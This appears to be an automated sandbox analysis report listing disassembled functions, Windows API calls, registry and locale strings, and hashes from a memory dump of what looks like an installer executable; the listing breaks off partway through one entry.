                                                                                    • String ID: jKb
                                                                                    • API String ID: 2919029540-170918238
                                                                                    • Opcode ID: c1b916c59321e3fa91579aeb3cdac3cd55d30723fa64c6d9926a0ea5d314481d
                                                                                    • Instruction ID: f0c62e7812bfd872003ae221291c5b02b096b3c9bac239c5ed21538e2c768951
                                                                                    • Opcode Fuzzy Hash: c1b916c59321e3fa91579aeb3cdac3cd55d30723fa64c6d9926a0ea5d314481d
                                                                                    • Instruction Fuzzy Hash: 25112A72600208AFCB44CEA9DC41DEFB7ECEB4D310B518566F908D3241D734AE108764
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AB518, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CountTick
                                                                                    • String ID: Failed to remove temporary directory: $Rm
                                                                                    • API String ID: 536389180-1076249570
                                                                                    • Opcode ID: 9455056cfd00dbf33753fac0645bc5bf9c8d6e161eee054098b2032e13d056f6
                                                                                    • Instruction ID: 398c982c0538bc614d191d51ddc6a0f8b2f8344efc011b20d1c36e18f0abd6f5
                                                                                    • Opcode Fuzzy Hash: 9455056cfd00dbf33753fac0645bc5bf9c8d6e161eee054098b2032e13d056f6
                                                                                    • Instruction Fuzzy Hash: 22012430A50B00AADB62FB71EC03B9973D7EB0A704F50542AF001972C3E7B4AC008E18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AAB88, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AAF73,00000000,006AAF8E,?,00000000,00000000,?,006B6424,00000006), ref: 006AABEA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: 3e3a4d0be09f8e92ab92d2551e3a83229c9f1976f345d8ef1f7fbdb37c4ae43b
                                                                                    • Instruction ID: 305c036771833dfdc17d30d00ed60186274228a7a0d0d41d10220e0ec65000dd
                                                                                    • Opcode Fuzzy Hash: 3e3a4d0be09f8e92ab92d2551e3a83229c9f1976f345d8ef1f7fbdb37c4ae43b
                                                                                    • Instruction Fuzzy Hash: 9FF0B430B45244AFDB01FAD4D956BAA7B9BD787314F60006EE1015B781D764AE40DB21
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C6790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID: Control Panel\Desktop\ResourceLocale$jn\
                                                                                    • API String ID: 71445658-1009623656
                                                                                    • Opcode ID: 4df7dab56c477363e90a00ee02f53cdc5579ada3479c64b4cdcbde454e119a82
                                                                                    • Instruction ID: f71c6a141f3997f2863d7813df77b61548f7dd53a97879805adc53d508b96e25
                                                                                    • Opcode Fuzzy Hash: 4df7dab56c477363e90a00ee02f53cdc5579ada3479c64b4cdcbde454e119a82
                                                                                    • Instruction Fuzzy Hash: E3D0C9769502287BAB009EC9DC41EFB7B9DEB19360F50841AFD0497101C6B4EDA187F4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406DF0, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualFree.KERNEL32(006CEADC,00000000,00008000), ref: 00406E0E
                                                                                    • VirtualFree.KERNEL32(006D0B80,00000000,00008000), ref: 00406E8A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FreeVirtual
                                                                                    • String ID: |l
                                                                                    • API String ID: 1263568516-2943479574
                                                                                    • Opcode ID: 32207062ea42549adb7d8cd3475f211863a90d9262ab72e18aeacffdd3282589
                                                                                    • Instruction ID: 7e10c0828048ea4be300fdc8c2ce23dddf2df71dc9f68ae824fb6f8d85bed3de
                                                                                    • Opcode Fuzzy Hash: 32207062ea42549adb7d8cd3475f211863a90d9262ab72e18aeacffdd3282589
                                                                                    • Instruction Fuzzy Hash: F411C1716003108FD7688F18C941B26BBE1FB88710F16807FE54AEF380D679AC018BD8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006ACDD0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 158windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendNotifyMessageW.USER32(0009025C,00000496,00002711,-00000001), ref: 006AD020
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageNotifySend
                                                                                    • String ID: MS PGothic
                                                                                    • API String ID: 3556456075-3532686627
                                                                                    • Opcode ID: b6c258fb3c33f2813c3342e6157044606e6013f872fb64804e9522e309d3d3da
                                                                                    • Instruction ID: 89a382baa9b680b343c583d8872c3f7c86f8ccc800703f58e8dd630edb69a3e5
                                                                                    • Opcode Fuzzy Hash: b6c258fb3c33f2813c3342e6157044606e6013f872fb64804e9522e309d3d3da
                                                                                    • Instruction Fuzzy Hash: 29516E307012408FCB10FF69D889E6A3BA3FB86354B64557AE4069F766CA35DC42CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00414D98, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 716092398-1824977358
                                                                                    • Opcode ID: 4c523ab884bdc3a49de6328adf8e7a054ac0ed32c9ba937a131d341f4e2fdf35
                                                                                    • Instruction ID: 2ae43f73961e2cef950b8e695cbe18b859b25492b357a47972b29cef978d1eeb
                                                                                    • Opcode Fuzzy Hash: 4c523ab884bdc3a49de6328adf8e7a054ac0ed32c9ba937a131d341f4e2fdf35
                                                                                    • Instruction Fuzzy Hash: BAF092B2604158BF9B80DE9DEC81EDB77ECEB4D2A4B05416AFA0CD3201D634ED118BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AAAD8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C6790: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,jn\,?,00000000,?,005C6E0A,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A), ref: 005C67AC
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B69F6,?,006AAD36,00000000,006AAF8E,?,00000000,00000000), ref: 006AAB1D
                                                                                    Strings
                                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AAAEF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseOpen
                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                    • API String ID: 47109696-1019749484
                                                                                    • Opcode ID: da8735f4dc006e90bb9b8b986ea425c324a21ddcfd42a3c6304858d0bd78099f
                                                                                    • Instruction ID: ff1a3d223dd7ccb396a2362d893f6dffa0b2018229c4d4fe2cb2bd772e9b64c8
                                                                                    • Opcode Fuzzy Hash: da8735f4dc006e90bb9b8b986ea425c324a21ddcfd42a3c6304858d0bd78099f
                                                                                    • Instruction Fuzzy Hash: 9CF0A7313002146BEA14B5DEAC86BAEA7DEDFC5754F20007FF608D7341DAA5AE018776
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060D628, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindNextFileW.KERNEL32(000000FF,?,00000000,0060D852,?,00000000,0060D8C6,?,?,?,006AB575,00000000,006AB4C4,00000000,00000000,00000001), ref: 0060D82E
                                                                                    • FindClose.KERNEL32(000000FF,0060D859,0060D852,?,00000000,0060D8C6,?,?,?,006AB575,00000000,006AB4C4,00000000,00000000,00000001,00000001), ref: 0060D84C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileNext
                                                                                    • String ID:
                                                                                    • API String ID: 2066263336-0
                                                                                    • Opcode ID: d48f2cbf2b9092f2daa8eb9adf7c3c818559f109f1d30e0a18f1e29d2656c723
                                                                                    • Instruction ID: 1c78dce3c56f1043e552bdc12dc5b32a6e7837210c4168244b7acddc60a03fe0
                                                                                    • Opcode Fuzzy Hash: d48f2cbf2b9092f2daa8eb9adf7c3c818559f109f1d30e0a18f1e29d2656c723
                                                                                    • Instruction Fuzzy Hash: 99818E30D442899EDF15DFA5C885BEEBBB6AF05304F1482AAE858732C1C7349F85CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005CF994, Relevance: 3.1, APIs: 2, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005CD18C: GetDC.USER32(00000000), ref: 005CD19D
                                                                                      • Part of subcall function 005CD18C: SelectObject.GDI32(0068C9D4,00000000), ref: 005CD1BF
                                                                                      • Part of subcall function 005CD18C: GetTextExtentPointW.GDI32(0068C9D4,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 005CD1D3
                                                                                      • Part of subcall function 005CD18C: GetTextMetricsW.GDI32(0068C9D4,?,00000000,005CD218,?,00000000,?,?,0068C9D4), ref: 005CD1F5
                                                                                      • Part of subcall function 005CD18C: ReleaseDC.USER32 ref: 005CD212
                                                                                    • MulDiv.KERNEL32(0068D3C3,00000006,00000006), ref: 005CFA61
                                                                                    • MulDiv.KERNEL32(?,?,0000000D), ref: 005CFA78
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Text$ExtentMetricsObjectPointReleaseSelect
                                                                                    • String ID:
                                                                                    • API String ID: 844173074-0
                                                                                    • Opcode ID: fd25a673d468ed6fabf3aa3adbc59892d19b3712dbcf1daa220eafedc1c648fb
                                                                                    • Instruction ID: ab832f5469577de02f6ead1a3026336d1fcba8013a7d9bcb612a7bf876de2192
                                                                                    • Opcode Fuzzy Hash: fd25a673d468ed6fabf3aa3adbc59892d19b3712dbcf1daa220eafedc1c648fb
                                                                                    • Instruction Fuzzy Hash: D841F835A00109EFCB04DBA8D985EADB7F9FB49314F2541A9F808EB361D771AE41DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00410ED4, Relevance: 3.1, APIs: 2, Instructions: 106COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00410FA3
                                                                                    • LocalFree.KERNEL32(00000000,00000000), ref: 00410FBD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Free$LibraryLocal
                                                                                    • String ID:
                                                                                    • API String ID: 3007483513-0
                                                                                    • Opcode ID: 2c56d0444da96fb36466aa933463bccba2c3bdcbce3cca605f17c6cf2350efff
                                                                                    • Instruction ID: 8866b8cac1c51f9e5027aba2395861c2b17d45cfec343fd2db600496dc988245
                                                                                    • Opcode Fuzzy Hash: 2c56d0444da96fb36466aa933463bccba2c3bdcbce3cca605f17c6cf2350efff
                                                                                    • Instruction Fuzzy Hash: DC318371D00105AB8B24DF96D5829FFB7B9AF88314B15811EFA0497351DBB8DDC1CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E8BC, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E967
                                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DefaultLanguage$SystemUser
                                                                                    • String ID:
                                                                                    • API String ID: 384301227-0
                                                                                    • Opcode ID: e8cd89fe78807f8a59e4ef6fd92fca2d24216d165143f74ece7b225ae6d9bccb
                                                                                    • Instruction ID: 67efb5fed51bc053756b647ddfd8e6ea43793a5abe40bf12c6ea97a73f2c0f5a
                                                                                    • Opcode Fuzzy Hash: e8cd89fe78807f8a59e4ef6fd92fca2d24216d165143f74ece7b225ae6d9bccb
                                                                                    • Instruction Fuzzy Hash: AF312F70A002199FDB10EB9AC882BAEB7B5EF48308F50497BE400B33D1D7789D558B99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00414020, Relevance: 3.1, APIs: 2, Instructions: 57libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00414083
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    • Opcode ID: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                                    • Instruction ID: b41df1fa75d381eed13266955d9feb05bf3a80cdd3b44aa66b38c7297c5ee5d6
                                                                                    • Opcode Fuzzy Hash: 87bbede48919e2c320656d28165f2dd41f3e4cb1cd8a5dac7222dfe60dbaf93b
                                                                                    • Instruction Fuzzy Hash: 3C11C631604208AFD701DF22CC529AD7BECEB8E714BA2047AF904E3680DB385F549599
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E9E0, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
